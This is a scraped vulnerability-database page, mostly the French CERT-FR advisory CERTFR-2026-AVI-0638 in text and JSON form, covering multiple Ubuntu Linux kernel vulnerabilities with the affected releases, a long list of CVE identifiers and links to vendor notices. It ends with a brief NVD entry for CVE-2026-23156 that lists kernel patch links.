"url": "https://access.redhat.com/errata/RHSA-2026:9870"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9836",
"url": "https://access.redhat.com/errata/RHSA-2026:9836"
},
{
"published_at": "2026-04-22",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:9514",
"url": "https://access.redhat.com/errata/RHSA-2026:9514"
}
]
}
CERTFR-2026-AVI-0638
Vulnerability from certfr_avis - Published: 2026-05-22 - Updated: 2026-05-22
De multiples vulnérabilités ont été découvertes dans le noyau Linux d'Ubuntu. Elles permettent à un attaquant de provoquer une élévation de privilèges et un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Ubuntu 16.04 ESM",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 20.04 ESM",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 24.04 LTS",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 18.04 ESM",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 25.10",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 14.04 ESM",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
},
{
"description": "Ubuntu 22.04 LTS",
"product": {
"name": "Ubuntu",
"vendor": {
"name": "Ubuntu",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-23198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23198"
},
{
"name": "CVE-2026-43078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-43078"
},
{
"name": "CVE-2024-50142",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50142"
},
{
"name": "CVE-2026-23202",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23202"
},
{
"name": "CVE-2026-23260",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23260"
},
{
"name": "CVE-2026-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23167"
},
{
"name": "CVE-2026-23129",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23129"
},
{
"name": "CVE-2025-38201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38201"
},
{
"name": "CVE-2025-71134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71134"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-68749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68749"
},
{
"name": "CVE-2025-71139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71139"
},
{
"name": "CVE-2026-23126",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23126"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2026-23159",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23159"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2023-2640",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2640"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2026-23187",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23187"
},
{
"name": "CVE-2026-23136",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23136"
},
{
"name": "CVE-2026-23139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23139"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23179",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23179"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2026-23258",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23258"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2026-23059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23059"
},
{
"name": "CVE-2026-23135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23135"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2026-23119",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23119"
},
{
"name": "CVE-2026-23173",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23173"
},
{
"name": "CVE-2026-23123",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23123"
},
{
"name": "CVE-2026-31431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31431"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-71090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71090"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71142"
},
{
"name": "CVE-2023-53520",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53520"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2025-40082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40082"
},
{
"name": "CVE-2026-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23150"
},
{
"name": "CVE-2026-23163",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23163"
},
{
"name": "CVE-2024-50304",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50304"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2026-43033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-43033"
},
{
"name": "CVE-2026-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23166"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2026-23264",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23264"
},
{
"name": "CVE-2025-71144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71144"
},
{
"name": "CVE-2026-23256",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23256"
},
{
"name": "CVE-2026-23116",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23116"
},
{
"name": "CVE-2025-71200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71200"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2026-23172",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23172"
},
{
"name": "CVE-2026-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23133"
},
{
"name": "CVE-2026-23131",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23131"
},
{
"name": "CVE-2026-23212",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23212"
},
{
"name": "CVE-2026-23032",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23032"
},
{
"name": "CVE-2026-23170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23170"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2026-23273",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23273"
},
{
"name": "CVE-2025-71188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71188"
},
{
"name": "CVE-2026-23125",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23125"
},
{
"name": "CVE-2025-38057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38057"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2026-23214",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23214"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-23178",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23178"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2023-53662",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53662"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2024-27388",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27388"
},
{
"name": "CVE-2026-31533",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31533"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-71220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71220"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2023-32629",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32629"
},
{
"name": "CVE-2025-68358",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68358"
},
{
"name": "CVE-2026-23180",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23180"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23262",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23262"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2026-23200",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23200"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2026-23216",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23216"
},
{
"name": "CVE-2025-71225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71225"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2026-43077",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-43077"
},
{
"name": "CVE-2024-49938",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49938"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2024-50008",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50008"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2026-23176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23176"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2026-23128",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23128"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2026-23140",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23140"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-71141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71141"
},
{
"name": "CVE-2026-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23146"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-71224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71224"
},
{
"name": "CVE-2026-23193",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23193"
},
{
"name": "CVE-2022-49033",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49033"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2026-23215",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23215"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2026-23151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23151"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2026-23205",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23205"
},
{
"name": "CVE-2025-71222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71222"
},
{
"name": "CVE-2026-31504",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31504"
},
{
"name": "CVE-2026-23142",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23142"
},
{
"name": "CVE-2026-23213",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23213"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2026-23121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23121"
},
{
"name": "CVE-2026-23274",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23274"
},
{
"name": "CVE-2025-71152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71152"
},
{
"name": "CVE-2026-23144",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23144"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2026-31419",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-31419"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2025-71268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71268"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2026-23164",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23164"
},
{
"name": "CVE-2026-23124",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23124"
},
{
"name": "CVE-2026-23257",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23257"
},
{
"name": "CVE-2025-71160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71160"
},
{
"name": "CVE-2024-58096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58096"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2026-23120",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23120"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2026-23168",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23168"
},
{
"name": "CVE-2024-50004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50004"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2024-35862",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35862"
},
{
"name": "CVE-2026-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23141"
},
{
"name": "CVE-2026-23065",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23065"
},
{
"name": "CVE-2026-23182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23182"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2026-23261",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23261"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2025-71193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71193"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2026-23062",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23062"
},
{
"name": "CVE-2026-23160",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23160"
},
{
"name": "CVE-2025-71155",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71155"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2026-23206",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23206"
},
{
"name": "CVE-2024-58097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58097"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23145"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-68823",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68823"
},
{
"name": "CVE-2026-23394",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23394"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2026-23112",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23112"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-23190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23190"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2026-23148",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23148"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2026-23050",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23050"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2026-23113",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23113"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2026-23231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23231"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2024-50060",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50060"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2026-23351",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23351"
},
{
"name": "CVE-2026-23254",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23254"
}
],
"initial_release_date": "2026-05-22T00:00:00",
"last_revision_date": "2026-05-22T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0638",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-05-22T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux d\u0027Ubuntu. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges et un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux d\u0027Ubuntu",
"vendor_advisories": [
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8273-1",
"url": "https://ubuntu.com/security/notices/USN-8273-1"
},
{
"published_at": "2026-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8289-1",
"url": "https://ubuntu.com/security/notices/USN-8289-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8278-1",
"url": "https://ubuntu.com/security/notices/USN-8278-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8275-1",
"url": "https://ubuntu.com/security/notices/USN-8275-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8280-1",
"url": "https://ubuntu.com/security/notices/USN-8280-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8279-1",
"url": "https://ubuntu.com/security/notices/USN-8279-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8254-3",
"url": "https://ubuntu.com/security/notices/USN-8254-3"
},
{
"published_at": "2026-05-21",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8291-1",
"url": "https://ubuntu.com/security/notices/USN-8291-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8277-1",
"url": "https://ubuntu.com/security/notices/USN-8277-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8255-3",
"url": "https://ubuntu.com/security/notices/USN-8255-3"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8274-1",
"url": "https://ubuntu.com/security/notices/USN-8274-1"
},
{
"published_at": "2026-05-19",
"title": "Bulletin de s\u00e9curit\u00e9 Ubuntu USN-8281-1",
"url": "https://ubuntu.com/security/notices/USN-8281-1"
}
]
}
FKIE_CVE-2026-23156
Vulnerability from fkie_nvd - Published: 2026-02-14 16:15 - Updated: 2026-03-18 14:40| URL | Tags | ||
|---|---|---|---|
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/3960f1754664661a970dc9ebbab44ff93a0b4c42 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/4b22ec1685ce1fc0d862dcda3225d852fb107995 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/510a16f1c5c1690b33504052bc13fbc2772c23f8 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/89b8ca709eeeabcc11ebba64806677873a2787a8 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/e4e15a0a4403c96d9898d8398f0640421df9cb16 | Patch |
| Vendor | Product | Version | |
|---|---|---|---|
| linux | linux_kernel | * | |
